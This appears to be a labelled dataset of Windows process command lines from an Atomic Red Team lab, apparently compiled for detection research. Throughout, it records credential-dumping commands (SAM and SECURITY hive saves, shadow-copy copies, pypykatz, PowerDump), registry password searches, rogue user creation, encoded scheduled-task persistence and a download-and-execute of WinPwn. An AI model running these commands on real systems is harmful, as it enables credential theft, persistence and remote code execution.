text
stringlengths
65
3.78k
label
int64
0
1
cmd.exe C:\Windows\System32\cmd.exe /c "net user $ /DELETE 2>&1" powershell.exe ar-win-2.attackrange.local
1
cmd.exe "cmd.exe" /c "sc.exe start spooler >nul 2>&1" powershell.exe ar-win-dc.attackrange.local
1
reg.exe unknown C:\Windows\System32\reg.exe query HKLM /f password /t REG_SZ /s cmd.exe C:\Windows\System32\cmd.exe ar-win-dc.attackrange.local Administrator
1
ar-win-2.attackrange.local AR-WIN-2$ C:\Windows\System32\winlogon.exe LogonUI.exe C:\Windows\System32\LogonUI.exe /flags:0x2 /state0:0xa3b8f055 /state1:0x41c64e6d
0
cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Program Files\SplunkUniversalForwarder\etc\system\bin\powershell.cmd" --scheme" splunkd.exe ar-win-dc.attackrange.local
1
ar-win-2.attackrange.local Administrator "powershell.exe" & {} HOSTNAME.EXE "C:\Windows\system32\HOSTNAME.EXE"
0
cmd.exe "C:\Windows\system32\cmd.exe" /c "if not exist "%programfiles%/WinRAR/Rar.exe" (exit /b 1)" powershell.exe ar-win-dc.attackrange.local
1
ar-win-2.attackrange.local AR-WIN-2$ C:\Windows\System32\svchost.exe SppExtComObj.Exe C:\Windows\system32\SppExtComObj.exe -Embedding
0
cmd.exe "cmd.exe" /c "mkdir C:\AtomicRedTeam\atomics\T1560.001\victim-files & cd C:\AtomicRedTeam\atomics\T1560.001\victim-files & echo "This file will be encrypted" > .\encrypted_file.txt & "%%ProgramFiles%%\7-zip\7z.exe" u archive.7z *txt -pblue & dir" powershell.exe ar-win-2.attackrange.local
1
ar-win-2.attackrange.local Administrator C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe HOSTNAME.EXE "C:\Windows\system32\HOSTNAME.EXE"
0
cmd.exe C:\Windows\System32\cmd.exe /c "sc.exe stop spooler" powershell.exe ar-win-dc.attackrange.local
1
cmd.exe C:\Windows\System32\cmd.exe /c "net user $ ATOMIC123! /add /active:yes" powershell.exe ar-win-dc.attackrange.local
1
cmd.exe C:\Windows\System32\cmd.exe /c "del C:\inetpub\wwwroot\b.jsp /q >nul 2>&1 & del C:\inetpub\wwwroot\tests.jsp /q >nul 2>&1 & del C:\inetpub\wwwroot\cmd.aspx /q >nul 2>&1" powershell.exe ar-win-2.attackrange.local
1
ar-win-2.attackrange.local AR-WIN-2$ C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe cmd.exe C:\Windows\system32\cmd.exe /c btool server list sslConfig --no-log
0
ar-win-2.attackrange.local Administrator "powershell.exe" -noninteractive -encodedcommand WwBDAG8AbgBzAG8AbABlAF0AOgA6AEkAbgBwAHUAdABFAG4AYwBvAGQAaQBuAGcAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFQAZQB4AHQALgBVAFQARgA4AEUAbgBjAG8AZABpAG4AZwAgACQAZgBhAGwAcwBlADsAIABJAG0AcABvAHIAdAAtAE0AbwBkAHUAbABlACAAIgBDADoAXABBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAFwAaQBuAHYAbwBrAGUALQBhAHQAbwBtAGkAYwByAGUAZAB0AGUAYQBtAFwASQBuAHYAbwBrAGUALQBBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAC4AcABzAGQAMQAiACAALQBGAG8AcgBjAGUACgBJAG4AdgBvAGsAZQAtAEEAdABvAG0AaQBjAFQAZQBzAHQAIAAiAFQAMQAwADAAMwAuADAAMAAyACIAIAAtAEMAbABlAGEAbgB1AHAA HOSTNAME.EXE "C:\Windows\system32\HOSTNAME.EXE"
0
cmd.exe C:\Windows\System32\cmd.exe /c "mkdir %temp%\T1222.001_cacls & echo T1222.001_cacls1 >> %temp%\T1222.001_cacls\T1222.001_cacls1.txt & echo T1222.001_cacls2 >> %temp%\T1222.001_cacls\T1222.001_cacls2.txt" powershell.exe ar-win-dc.attackrange.local
1
cmd.exe C:\Windows\System32\cmd.exe /c "sc sdset AtomicService "D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)" & sc.exe delete AtomicService" powershell.exe ar-win-dc.attackrange.local
1
cmd.exe "cmd.exe" /c "schtasks /delete /tn "ATOMIC-T1053.005" /F >nul 2>&1 & reg delete HKCU\SOFTWARE\ATOMIC-T1053.005 /F >nul 2>&1" powershell.exe ar-win-dc.attackrange.local
1
ar-win-2.attackrange.local Administrator "powershell.exe" -noninteractive -encodedcommand WwBDAG8AbgBzAG8AbABlAF0AOgA6AEkAbgBwAHUAdABFAG4AYwBvAGQAaQBuAGcAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFQAZQB4AHQALgBVAFQARgA4AEUAbgBjAG8AZABpAG4AZwAgACQAZgBhAGwAcwBlADsAIABJAG0AcABvAHIAdAAtAE0AbwBkAHUAbABlACAAIgBDADoAXABBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAFwAaQBuAHYAbwBrAGUALQBhAHQAbwBtAGkAYwByAGUAZAB0AGUAYQBtAFwASQBuAHYAbwBrAGUALQBBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAC4AcABzAGQAMQAiACAALQBGAG8AcgBjAGUACgBJAG4AdgBvAGsAZQAtAEEAdABvAG0AaQBjAFQAZQBzAHQAIAAiAFQAMQAwADAAMwAuADAAMAAyACIAIAAtAEMAbwBuAGYAaQByAG0AOgAkAGYAYQBsAHMAZQAgAC0AVABpAG0AZQBvAHUAdABTAGUAYwBvAG4AZABzACAAMwAwADAAIAAtAEUAeABlAGMAdQB0AGkAbwBuAEwAbwBnAFAAYQB0AGgAIABDADoAXABBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAFwAYQB0AGMAXwBlAHgAZQBjAHUAdABpAG8AbgAuAGMAcwB2AA== powershell.exe "powershell.exe" & {Write-Host \""STARTING TO SET BYPASS and DISABLE DEFENDER REALTIME MON\"" -fore green Import-Module \""C:\AtomicRedTeam\atomics\..\ExternalPayloads\PowerDump.ps1\"" Invoke-PowerDump}
0
ar-win-2.attackrange.local AR-WIN-2$ C:\Windows\System32\services.exe svchost.exe C:\Windows\system32\svchost.exe -k NetworkService
0
ar-win-2.attackrange.local Administrator C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\ADMINI~1\AppData\Local\Temp\RESC4B4.tmp" "c:\Users\Administrator\AppData\Local\Temp\CSC437413C06BDA4FE78897DEC5E82414CB.TMP"
0
ar-win-2.attackrange.local AR-WIN-2$ C:\Windows\System32\services.exe amazon-ssm-agent.exe "C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe"
0
ar-win-2.attackrange.local Administrator C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe cmd.exe C:\Windows\System32\cmd.exe /c "del %temp%\sam >nul 2> nul & del %temp%\system >nul 2> nul & del %temp%\security >nul 2> nul"
0
cmd.exe "cmd.exe" /c "cmd /r cmd<C:\AtomicRedTeam\atomics\T1059.003\src\t1059.003_cmd.cmd" powershell.exe ar-win-2.attackrange.local
1
cmd.exe Cmd.Exe "cmd.exe" /c "rmdir /s /Q C:\AtomicRedTeam\atomics\T1560.001\victim-files >nul 2>&1" powershell.exe "powershell.exe" -noninteractive -encodedcommand WwBDAG8AbgBzAG8AbABlAF0AOgA6AEkAbgBwAHUAdABFAG4AYwBvAGQAaQBuAGcAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFQAZQB4AHQALgBVAFQARgA4AEUAbgBjAG8AZABpAG4AZwAgACQAZgBhAGwAcwBlADsAIABJAG0AcABvAHIAdAAtAE0AbwBkAHUAbABlACAAIgBDADoAXABBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAFwAaQBuAHYAbwBrAGUALQBhAHQAbwBtAGkAYwByAGUAZAB0AGUAYQBtAFwASQBuAHYAbwBrAGUALQBBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAC4AcABzAGQAMQAiACAALQBGAG8AcgBjAGUACgBJAG4AdgBvAGsAZQAtAEEAdABvAG0AaQBjAFQAZQBzAHQAIAAiAFQAMQA1ADYAMAAuADAAMAAxACIAIAAtAEMAbABlAGEAbgB1AHAA ar-win-2.attackrange.local Administrator
1
ar-win-2.attackrange.local Administrator "powershell.exe" -noninteractive -encodedcommand WwBDAG8AbgBzAG8AbABlAF0AOgA6AEkAbgBwAHUAdABFAG4AYwBvAGQAaQBuAGcAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFQAZQB4AHQALgBVAFQARgA4AEUAbgBjAG8AZABpAG4AZwAgACQAZgBhAGwAcwBlADsAIABJAG0AcABvAHIAdAAtAE0AbwBkAHUAbABlACAAIgBDADoAXABBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAFwAaQBuAHYAbwBrAGUALQBhAHQAbwBtAGkAYwByAGUAZAB0AGUAYQBtAFwASQBuAHYAbwBrAGUALQBBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAC4AcABzAGQAMQAiACAALQBGAG8AcgBjAGUACgBJAG4AdgBvAGsAZQAtAEEAdABvAG0AaQBjAFQAZQBzAHQAIAAiAFQAMQAwADAAMwAuADAAMAAyACIAIAAtAEcAZQB0AFAAcgBlAHIAZQBxAHMA HOSTNAME.EXE "C:\Windows\system32\HOSTNAME.EXE"
0
ar-win-2.attackrange.local Administrator C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe HOSTNAME.EXE "C:\Windows\system32\HOSTNAME.EXE"
0
cmd.exe "cmd.exe" /c "net.exe start spooler >nul 2>&1" powershell.exe ar-win-2.attackrange.local
1
ar-win-2.attackrange.local Administrator "cmd.exe" /c "for /L %a in (1,1,10) do @(certutil -f -v -encodehex "\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy%a\Windows\System32\config\SAM" %temp%\SAMvss%a 2 >nul 2>&1) && dir /B %temp%\SAMvss%a" certutil.exe certutil -f -v -encodehex "\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy3\Windows\System32\config\SAM" C:\Users\ADMINI~1\AppData\Local\Temp\SAMvss3 2
0
ar-win-2.attackrange.local AR-WIN-2$ C:\Windows\System32\services.exe spoolsv.exe C:\Windows\System32\spoolsv.exe
0
cmd.exe C:\Windows\System32\cmd.exe /c "rmdir /s /Q C:\AtomicRedTeam\atomics\T1560.001\victim-files >nul 2>&1" powershell.exe ar-win-dc.attackrange.local
1
cmd.exe C:\Windows\System32\cmd.exe /c ""%programfiles%/WinRAR/Rar.exe" a -r %USERPROFILE%\T1560.001-data.rar %USERPROFILE%\*.txt" powershell.exe ar-win-dc.attackrange.local
1
ar-win-2.attackrange.local AR-WIN-2$ C:\Windows\System32\svchost.exe dllhost.exe C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E}
0
cmd.exe "cmd.exe" /c "sc.exe stop spooler" powershell.exe ar-win-2.attackrange.local
1
cmd.exe C:\Windows\System32\cmd.exe /c "%LOCALAPPDATA:~-3,1%md /c echo Hello, from CMD! > hello.txt & type hello.txt" powershell.exe ar-win-2.attackrange.local
1
cmd.exe "C:\Windows\system32\cmd.exe" /c "IF EXIST %%temp%%\T1222.001_attrib ( EXIT 0 ) ELSE ( EXIT 1 )" powershell.exe ar-win-dc.attackrange.local
1
cmd.exe cmd.exe /c "reg.exe save hklm\system C:\Users\ADMINI~1\AppData\Local\Temp\nhvybvu" WinCreds.exe ar-win-dc.attackrange.local
1
ar-win-2.attackrange.local Administrator "powershell.exe" & {Write-Host \""STARTING TO SET BYPASS and DISABLE DEFENDER REALTIME MON\"" -fore green Import-Module \""C:\AtomicRedTeam\atomics\..\ExternalPayloads\PowerDump.ps1\"" Invoke-PowerDump} csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Administrator\AppData\Local\Temp\vmcjfqdn\vmcjfqdn.cmdline"
0
cmd.exe C:\Windows\System32\cmd.exe /c "rmdir /s /Q C:\AtomicRedTeam\atomics\T1560.001\victim-files >nul 2>&1" powershell.exe ar-win-2.attackrange.local
1
ar-win-2.attackrange.local Administrator "C:\Windows\system32\cmd.exe" /c "py -3 --version >nul 2>&1 && exit /b %errorlevel%" py.exe py -3 --version
0
ar-win-2.attackrange.local AR-WIN-2$ C:\Windows\System32\CompatTelRunner.exe conhost.exe \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
0
cmd.exe C:\Windows\System32\cmd.exe /c "schtasks /delete /tn "ATOMIC-T1053.005" /F >nul 2>&1 & reg delete HKCU\SOFTWARE\ATOMIC-T1053.005 /F >nul 2>&1" powershell.exe ar-win-dc.attackrange.local
1
sc.exe unknown C:\Windows\System32\sc.exe stop spooler cmd.exe C:\Windows\System32\cmd.exe ar-win-2.attackrange.local Administrator
1
ar-win-2.attackrange.local Administrator "powershell.exe" -noninteractive -encodedcommand WwBDAG8AbgBzAG8AbABlAF0AOgA6AEkAbgBwAHUAdABFAG4AYwBvAGQAaQBuAGcAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFQAZQB4AHQALgBVAFQARgA4AEUAbgBjAG8AZABpAG4AZwAgACQAZgBhAGwAcwBlADsAIABJAG0AcABvAHIAdAAtAE0AbwBkAHUAbABlACAAIgBDADoAXABBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAFwAaQBuAHYAbwBrAGUALQBhAHQAbwBtAGkAYwByAGUAZAB0AGUAYQBtAFwASQBuAHYAbwBrAGUALQBBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAC4AcABzAGQAMQAiACAALQBGAG8AcgBjAGUACgBJAG4AdgBvAGsAZQAtAEEAdABvAG0AaQBjAFQAZQBzAHQAIAAiAFQAMQAwADAAMwAuADAAMAAyACIAIAAtAEMAbwBuAGYAaQByAG0AOgAkAGYAYQBsAHMAZQAgAC0AVABpAG0AZQBvAHUAdABTAGUAYwBvAG4AZABzACAAMwAwADAAIAAtAEUAeABlAGMAdQB0AGkAbwBuAEwAbwBnAFAAYQB0AGgAIABDADoAXABBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAFwAYQB0AGMAXwBlAHgAZQBjAHUAdABpAG8AbgAuAGMAcwB2AA== cmd.exe "cmd.exe" /c "esentutl.exe /y /vss %%SystemRoot%%/system32/config/SAM /d %%temp%%/SAM"
0
cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Program Files\SplunkUniversalForwarder\etc\system\bin\WinRegMon.cmd" --scheme" splunkd.exe ar-win-dc.attackrange.local
1
cmd.exe C:\Windows\System32\cmd.exe /c "icacls "C:\Users\Public\*" /grant Everyone:F /T /C /Q" powershell.exe ar-win-dc.attackrange.local
1
ar-win-2.attackrange.local Administrator C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe HOSTNAME.EXE "C:\Windows\system32\HOSTNAME.EXE"
0
ar-win-2.attackrange.local AR-WIN-2$ C:\Windows\System32\cmd.exe btool.exe "C:\Program Files\SplunkUniversalForwarder\bin\btool.exe" server list general --no-log
0
ar-win-2.attackrange.local AR-WIN-2$ C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe cmd.exe C:\Windows\system32\cmd.exe /c btool server list general --no-log
0
cmd.exe "cmd.exe" /c "reg query HKLM /f password /t REG_SZ /s & reg query HKCU /f password /t REG_SZ /s" powershell.exe ar-win-dc.attackrange.local
1
ar-win-2.attackrange.local Administrator "powershell.exe" -noninteractive -encodedcommand WwBDAG8AbgBzAG8AbABlAF0AOgA6AEkAbgBwAHUAdABFAG4AYwBvAGQAaQBuAGcAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFQAZQB4AHQALgBVAFQARgA4AEUAbgBjAG8AZABpAG4AZwAgACQAZgBhAGwAcwBlADsAIABJAG0AcABvAHIAdAAtAE0AbwBkAHUAbABlACAAIgBDADoAXABBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAFwAaQBuAHYAbwBrAGUALQBhAHQAbwBtAGkAYwByAGUAZAB0AGUAYQBtAFwASQBuAHYAbwBrAGUALQBBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAC4AcABzAGQAMQAiACAALQBGAG8AcgBjAGUACgBJAG4AdgBvAGsAZQAtAEEAdABvAG0AaQBjAFQAZQBzAHQAIAAiAFQAMQAwADAAMwAuADAAMAAyACIAIAAtAEMAbwBuAGYAaQByAG0AOgAkAGYAYQBsAHMAZQAgAC0AVABpAG0AZQBvAHUAdABTAGUAYwBvAG4AZABzACAAMwAwADAAIAAtAEUAeABlAGMAdQB0AGkAbwBuAEwAbwBnAFAAYQB0AGgAIABDADoAXABBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAFwAYQB0AGMAXwBlAHgAZQBjAHUAdABpAG8AbgAuAGMAcwB2AA== HOSTNAME.EXE "C:\Windows\system32\HOSTNAME.EXE"
0
ar-win-2.attackrange.local AR-WIN-2$ C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Program Files\SplunkUniversalForwarder\etc\system\bin\powershell2.cmd" --scheme"
0
ar-win-2.attackrange.local AR-WIN-2$ C:\Windows\System32\svchost.exe taskhostw.exe C:\Windows\System32\taskhostw.exe SYSTEM
0
ar-win-2.attackrange.local Administrator C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\ADMINI~1\AppData\Local\Temp\RESD80D.tmp" "c:\Users\Administrator\AppData\Local\Temp\d01zol5d\CSCE257E7E2116D4FB7834BC256C88DF52.TMP"
0
ar-win-2.attackrange.local Administrator "C:\Windows\system32\cmd.exe" /c "py -3 -m pip --version >nul 2>&1 && exit /b %errorlevel%" py.exe py -3 -m pip --version
0
cmd.exe "C:\Windows\system32\cmd.exe" /c "IF EXIST %temp%\T1222.001_takeown_folder ( EXIT 0 ) ELSE ( EXIT 1 )" powershell.exe ar-win-2.attackrange.local
1
cmd.exe C:\Windows\System32\cmd.exe /c "reg add HKCU\SOFTWARE\ATOMIC-T1053.005 /v test /t REG_SZ /d cGluZyAxMjcuMC4wLjE= /f & schtasks.exe /Create /F /TN "ATOMIC-T1053.005" /TR "cmd /c start /min \"\" powershell.exe -Command IEX([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String((Get-ItemProperty -Path HKCU:\\SOFTWARE\\ATOMIC-T1053.005).test)))" /sc daily /st 07:45" powershell.exe ar-win-dc.attackrange.local
1
ar-win-2.attackrange.local AR-WIN-2$ C:\Windows\System32\mcbuilder.exe conhost.exe \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
0
ar-win-2.attackrange.local Administrator C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\ADMINI~1\AppData\Local\Temp\RESD3C7.tmp" "c:\Users\Administrator\AppData\Local\Temp\iqg5l5hb\CSC9E169E65B05B4E51B224626AAB45EE88.TMP"
0
cmd.exe "cmd.exe" /c "icacls C:\Users\Public\* /save %%temp%%\T1222.001-folder-perms-backup.txt /t /q >nul 2>&1" powershell.exe ar-win-dc.attackrange.local
1
ar-win-2.attackrange.local Administrator "powershell.exe" & {1..10 | % { try { [System.IO.File]::Copy(\""\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy$_\Windows\System32\config\SAM\"" , \""$env:TEMP\SAMvss$_\"", \""true\"") } catch {} ls \""$env:TEMP\SAMvss$_\"" -ErrorAction Ignore }} HOSTNAME.EXE "C:\Windows\system32\HOSTNAME.EXE"
0
ar-win-2.attackrange.local Administrator C:\Python311\python.exe cmd.exe C:\Windows\system32\cmd.exe /c "ver"
0
reg.exe C:\Windows\System32\reg.exe save HKLM\security C:\Users\ADMINI~1\AppData\Local\Temp\security C:\Windows\System32\cmd.exe ar-win-dc.attackrange.local Administrator
1
cmd.exe "C:\Windows\system32\cmd.exe" /c "if not exist "%ProgramFiles%\WinZip\winzip64.exe" (echo 1) else (echo 0)" powershell.exe ar-win-dc.attackrange.local
1
ar-win-2.attackrange.local AR-WIN-2$ C:\Windows\System32\svchost.exe DiskSnapshot.exe "C:\Windows\system32\disksnapshot.exe" -z
0
ar-win-2.attackrange.local Administrator C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe HOSTNAME.EXE "C:\Windows\system32\HOSTNAME.EXE"
0
cmd.exe C:\Windows\System32\cmd.exe /c "icacls 'C:\Users\Public\*' /restore %temp%\T1222.001-folder-perms-backup.txt /q >nul 2>&1" powershell.exe ar-win-dc.attackrange.local
1
ar-win-2.attackrange.local Administrator C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe HOSTNAME.EXE "C:\Windows\system32\HOSTNAME.EXE"
0
ar-win-2.attackrange.local Administrator C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe HOSTNAME.EXE "C:\Windows\system32\HOSTNAME.EXE"
0
ar-win-2.attackrange.local Administrator C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe HOSTNAME.EXE "C:\Windows\system32\HOSTNAME.EXE"
0
cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Program Files\SplunkUniversalForwarder\etc\system\bin\WinNetMon.cmd" --scheme" splunkd.exe ar-win-2.attackrange.local
1
ar-win-2.attackrange.local AR-WIN-2$ C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe cmd.exe C:\Windows\system32\cmd.exe /c "C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal check-xml-files --answer-yes --no-prompt 2>&1
0
cmd.exe C:\Windows\System32\cmd.exe /c "sc sdset AtomicService "D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)" & sc.exe delete AtomicService" powershell.exe ar-win-2.attackrange.local
1
ar-win-2.attackrange.local Administrator "powershell.exe" & {$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t' iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1') samfile -consoleoutput -noninteractive} HOSTNAME.EXE "C:\Windows\system32\HOSTNAME.EXE"
0
reg.exe reg.exe reg query HKCU\Software\SimonTatham\PuTTY\Sessions /t REG_SZ /s cmd.exe "cmd.exe" /c "reg query HKCU\Software\SimonTatham\PuTTY\Sessions /t REG_SZ /s" ar-win-2.attackrange.local Administrator
1
cmd.exe C:\Windows\System32\cmd.exe /c "net user $ ATOMIC123! /add /active:yes" powershell.exe ar-win-2.attackrange.local
1
cmd.exe Cmd.Exe "cmd.exe" /c "rmdir /s /Q C:\AtomicRedTeam\atomics\T1560.001\victim-files >nul 2>&1" powershell.exe "powershell.exe" -noninteractive -encodedcommand WwBDAG8AbgBzAG8AbABlAF0AOgA6AEkAbgBwAHUAdABFAG4AYwBvAGQAaQBuAGcAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFQAZQB4AHQALgBVAFQARgA4AEUAbgBjAG8AZABpAG4AZwAgACQAZgBhAGwAcwBlADsAIABJAG0AcABvAHIAdAAtAE0AbwBkAHUAbABlACAAIgBDADoAXABBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAFwAaQBuAHYAbwBrAGUALQBhAHQAbwBtAGkAYwByAGUAZAB0AGUAYQBtAFwASQBuAHYAbwBrAGUALQBBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAC4AcABzAGQAMQAiACAALQBGAG8AcgBjAGUACgBJAG4AdgBvAGsAZQAtAEEAdABvAG0AaQBjAFQAZQBzAHQAIAAiAFQAMQA1ADYAMAAuADAAMAAxACIAIAAtAEMAbABlAGEAbgB1AHAA ar-win-dc.attackrange.local Administrator
1
ar-win-2.attackrange.local Administrator "powershell.exe" -noninteractive -encodedcommand WwBDAG8AbgBzAG8AbABlAF0AOgA6AEkAbgBwAHUAdABFAG4AYwBvAGQAaQBuAGcAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFQAZQB4AHQALgBVAFQARgA4AEUAbgBjAG8AZABpAG4AZwAgACQAZgBhAGwAcwBlADsAIABJAG0AcABvAHIAdAAtAE0AbwBkAHUAbABlACAAIgBDADoAXABBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAFwAaQBuAHYAbwBrAGUALQBhAHQAbwBtAGkAYwByAGUAZAB0AGUAYQBtAFwASQBuAHYAbwBrAGUALQBBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAC4AcABzAGQAMQAiACAALQBGAG8AcgBjAGUACgBJAG4AdgBvAGsAZQAtAEEAdABvAG0AaQBjAFQAZQBzAHQAIAAiAFQAMQAwADAAMwAuADAAMAAyACIAIAAtAEMAbwBuAGYAaQByAG0AOgAkAGYAYQBsAHMAZQAgAC0AVABpAG0AZQBvAHUAdABTAGUAYwBvAG4AZABzACAAMwAwADAAIAAtAEUAeABlAGMAdQB0AGkAbwBuAEwAbwBnAFAAYQB0AGgAIABDADoAXABBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAFwAYQB0AGMAXwBlAHgAZQBjAHUAdABpAG8AbgAuAGMAcwB2AA== cmd.exe "cmd.exe" /c "pypykatz live registry"
0
ar-win-2.attackrange.local AR-WIN-2$ C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngentask.exe conhost.exe \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
0
ar-win-2.attackrange.local Administrator C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe cmd.exe C:\Windows\System32\cmd.exe /c "del %temp%\SAM >nul 2>&1"
0
ar-win-2.attackrange.local Administrator C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe cmd.exe C:\Windows\System32\cmd.exe /c ""
0
cmd.exe "C:\Windows\system32\cmd.exe" /c "for /l %x in (1,1,75) do start wordpad.exe /p C:\AtomicRedTeam\atomics\..\ExternalPayloads\T1059_003note.txt" powershell.exe ar-win-dc.attackrange.local
1
cmd.exe C:\Windows\system32\cmd.exe /C PowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand UABvAHcAZQByAFMAaABlAGwAbAAgAC0ATgBvAFAAcgBvAGYAaQBsAGUAIAAtAE4AbwBuAEkAbgB0AGUAcgBhAGMAdABpAHYAZQAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIABVAG4AcgBlAHMAdAByAGkAYwB0AGUAZAAgAC0ARQBuAGMAbwBkAGUAZABDAG8AbQBtAGEAbgBkACAASgBnAEIAagBBAEcAZwBBAFkAdwBCAHcAQQBDADQAQQBZAHcAQgB2AEEARwAwAEEASQBBAEEAMgBBAEQAVQBBAE0AQQBBAHcAQQBEAEUAQQBJAEEAQQArAEEAQwBBAEEASgBBAEIAdQBBAEgAVQBBAGIAQQBCAHMAQQBBAG8AQQBhAFEAQgBtAEEAQwBBAEEASwBBAEEAawBBAEYAQQBBAFUAdwBCAFcAQQBHAFUAQQBjAGcAQgB6AEEARwBrAEEAYgB3AEIAdQBBAEYAUQBBAFkAUQBCAGkAQQBHAHcAQQBaAFEAQQB1AEEARgBBAEEAVQB3AEIAVwBBAEcAVQBBAGMAZwBCAHoAQQBHAGsAQQBiAHcAQgB1AEEAQwBBAEEATABRAEIAcwBBAEgAUQBBAEkAQQBCAGIAQQBGAFkAQQBaAFEAQgB5AEEASABNAEEAYQBRAEIAdgBBAEcANABBAFgAUQBBAGkAQQBEAE0AQQBMAGcAQQB3AEEAQwBJAEEASwBRAEEAZwBBAEgAcwBBAEMAZwBBAG4AQQBIAHMAQQBJAGcAQgBtAEEARwBFAEEAYQBRAEIAcwBBAEcAVQBBAFoAQQBBAGkAQQBEAG8AQQBkAEEAQgB5AEEASABVAEEAWgBRAEEAcwBBAEMASQBBAGIAUQBCAHoAQQBHAGMAQQBJAGcAQQA2AEEAQwBJAEEAUQBRAEIAdQBBAEgATQBBAGEAUQBCAGkAQQBHAHcAQQBaAFEAQQBnAEEASABJAEEAWgBRAEIAeABBAEgAVQBBAGEAUQBCAHkAQQBHAFUAQQBjAHcAQQBnAEEARgBBAEEAYgB3AEIAMwBBAEcAVQBBAGMAZwBCAFQAQQBHAGcAQQBaAFEAQgBzAEEARwB3AEEASQBBAEIAMgBBAEQATQBBAEwAZwBBAHcAQQBDAEEAQQBiAHcAQgB5AEEAQwBBAEEAYgBnAEIAbABBAEgAYwBBAFoAUQBCAHkAQQBDAEkAQQBmAFEAQQBuAEEAQQBvAEEAWgBRAEIANABBAEcAawBBAGQAQQBBAGcAQQBEAEUAQQBDAGcAQgA5AEEAQQBvAEEASgBBAEIAbABBAEgAZwBBAFoAUQBCAGoAQQBGADgAQQBkAHcAQgB5AEEARwBFAEEAYwBBAEIAdwBBAEcAVQBBAGMAZwBCAGYAQQBIAE0AQQBkAEEAQgB5AEEAQwBBAEEAUABRAEEAZwBBAEMAUQBBAGEAUQBCAHUAQQBIAEEAQQBkAFE